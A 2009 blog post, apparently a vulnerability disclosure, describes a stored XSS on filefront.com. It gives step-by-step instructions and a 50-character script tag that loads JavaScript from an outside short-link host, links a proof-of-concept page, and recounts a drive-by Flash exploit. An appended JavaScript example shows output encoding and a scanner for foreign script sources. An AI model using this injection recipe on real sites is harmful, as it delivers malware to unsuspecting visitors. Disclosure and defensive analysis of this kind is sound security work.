Posted on January 28th, 2009
This article is written in both English and Romanian.
I found a way to plant a permanent (stored) XSS in a comment on files uploaded to the file-sharing site filefront.com. Permanent XSS can do more damage than you might think. This one lets JavaScript into the comments, and that JavaScript is executed for every user who opens the file's download page.

I wanted to download a file from filefront.com and, right when I entered the download page, the antivirus warned me about a file named orz.exe and asked whether to run it or not. I clicked "no" and looked for it; it was in my Temp folder. I analysed that web page and noticed one particular comment that had JavaScript code in it. It forced the browser to open a Flash file (.swf), which was actually a Flash Player 9 exploit, through which it downloaded and ran an .exe file without the user's consent. This is a serious security issue.

How to get the XSS: create an account on filefront. Log in, click on Add Blog and you will get an "add blog entry" page. The title is not filtered, and that is where you inject the JavaScript. The only problem you will encounter is the character limit, 50 characters. Therefore the easiest payload is a <script src=..., something like: lol<script src=http://tinyurl.com/xxxxxx></script>

I used tinyurl.com to shorten the URL so the payload fits within the limit. Do not use the ' character around the src= value.

After you have created the blog entry, go to the page whose comments you want to "corrupt" and post something. Edit the post and click on Insert Object -> Insert Blog. Select the blog entry you just created from that list, click Insert Blog, then click on "Edit comment". That's all: the unfiltered title is copied into the comment HTML as-is.

Proof of concept: http://files.filefront.com/testtxt/1;12934435;/fileinfo.html

As I was saying, in my case the .exe started to download because I was using Flash Player 9. It does not matter which browser you use; as long as you have JavaScript enabled, the injected script runs. You can also get infected with JavaScript disabled if you enter a page that has, hidden somewhere in its HTML, something that opens a malicious .swf. My advice is to update to the latest version of Flash Player: http://get.adobe.com/flashplayer/
Romanian version (translated to English):

I found a way to get a permanent XSS into a comment on the files uploaded to the well-known file-upload site filefront.com. You will probably say you cannot do much with an XSS, but you are wrong, especially in the case of permanent XSS.

Through it we can post JavaScript in the comments, JavaScript that will be executed without the knowledge of the user who opens the page to download the file.

I wanted to download a file from filefront and, as soon as I opened the download page, the antivirus warned me that a file named orz.exe had just been launched and looked unsafe, asking whether to let it run. I clicked "no" and looked for the file; it was in Temp. I analysed that page and saw that among the comments there was one more "suspicious" than the rest, with JavaScript code injected into it. It forced the browser to open a Flash file (.swf) that was in fact an exploit for Flash Player 9, through which it downloaded and ran an .exe without the user's knowledge, which is a very serious security problem.

The XSS is obtained as follows: create an account on filefront, log in, click ADD BLOG on the left and an "add blog entry" page appears. The title is unfiltered; that is where you inject the JavaScript code. The only problem is the character limit of 50, so the easiest way is with a <script src=..., something like: lol<script src=http://tinyurl.com/xxxxxx></script>

I used tinyurl.com for a shorter link so as to fit within the 50-character limit. Do not use ' around the src= value.

After you have created the blog entry, go to the page of the file whose comments you want to "infect" and post something. Edit the post and go to Insert Object -> Insert Blog. Select the blog entry you just created from that list, click Insert Blog, click "Edit comment" and you are done.

Proof of concept: http://files.filefront.com/testtxt/1;12934435;/fileinfo.html

As I said, in my case the .exe ended up downloading because I had Flash Player 9. The browser does not matter. It could have been Internet Explorer, Firefox, Opera, etc.; with JavaScript enabled it would have "caught" me anyway. And even with JavaScript disabled you can be infected, for the simple reason that you can land on a page with a piece of HTML hidden somewhere that opens an .swf, and you still get infected.

I advise you to update urgently to the latest version of Flash Player (currently version 10): http://get.adobe.com/flashplayer/
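The procedure above (in both the English and the Romanian text) boils down to one rendering flaw: a blog-entry title that is never encoded is copied into a file's comment HTML, and a 50-character title is enough for a `<script src=...>` tag. The following is an added example, not filefront.com's code and not the author's, that models that sink next to the output encoding that fixes it, and includes the kind of check the author performed by hand: listing every external `<script src=...>` origin found in a comment section. The function names (`renderCommentUnsafe`, `renderCommentSafe`, `findExternalScripts`, `scriptHosts`) and the sample comment body are hypothetical; the payload string is the one given in the post.

```javascript
// Added example (not filefront.com's code): an unfiltered blog-entry title
// rendered into comment HTML, the encoded version that neutralizes it, and a
// scan for external script origins. All names below are hypothetical.

const TITLE_LIMIT = 50; // title length limit the post reports

// Constructed payload in the exact shape given in the post; the short URL is
// what keeps it within the 50-character limit (it is exactly 50 characters).
const PAYLOAD = 'lol<script src=http://tinyurl.com/xxxxxx></script>';

function fitsTitleLimit(title) {
  return title.length <= TITLE_LIMIT;
}

// Vulnerable sink: the title is concatenated into HTML as-is. This mirrors
// the behaviour the post describes and is kept deliberately.
function renderCommentUnsafe(title, body) {
  return `<div class="comment"><h4>${title}</h4><p>${body}</p></div>`;
}

// Fix: entity-encode every value placed in an HTML text context, so the
// browser sees literal characters instead of tags.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderCommentSafe(title, body) {
  return `<div class="comment"><h4>${escapeHtml(title)}</h4><p>${escapeHtml(body)}</p></div>`;
}

// Detection: return the src of every <script src=...> in a blob of HTML.
// Quoted and unquoted src attributes are both handled, since the post's
// payload uses the unquoted form.
const SCRIPT_SRC_RE = /<script\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi;

function findExternalScripts(html) {
  return Array.from(html.matchAll(SCRIPT_SRC_RE), (m) => m[1]);
}

// Hostnames of the injected scripts, for comparison against the site's own
// domains. A src that is not a parseable URL is reported as-is, not dropped.
function scriptHosts(html) {
  return findExternalScripts(html).map((src) => {
    try {
      return new URL(src).hostname;
    } catch (e) {
      return src;
    }
  });
}

// Stand-alone run: the payload fits the limit, the unsafe renderer emits a
// live <script> tag pointing at tinyurl.com, and the safe renderer does not.
function demo() {
  const body = 'nice file'; // constructed comment body
  const unsafe = renderCommentUnsafe(PAYLOAD, body);
  const safe = renderCommentSafe(PAYLOAD, body);
  return {
    fitsLimit: fitsTitleLimit(PAYLOAD),
    unsafeHosts: scriptHosts(unsafe),
    safeHosts: scriptHosts(safe),
  };
}

console.log(JSON.stringify(demo()));
```

Running the block prints `{"fitsLimit":true,"unsafeHosts":["tinyurl.com"],"safeHosts":[]}`. Encoding the title at the point it is written into HTML is the fix for the sink the post found; the scan over rendered HTML is only a way to spot comments that already carry a foreign script, and it says nothing about what the remote script does once loaded.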

January 28th, 2009 at 4:39 pm
Patched already?
January 29th, 2009 at 5:33 am
From what the PoC shows, still working.
February 8th, 2009 at 8:10 pm
One thing is certain, it still works:
http://img516.imageshack.us/img516/1821/qwdta3.png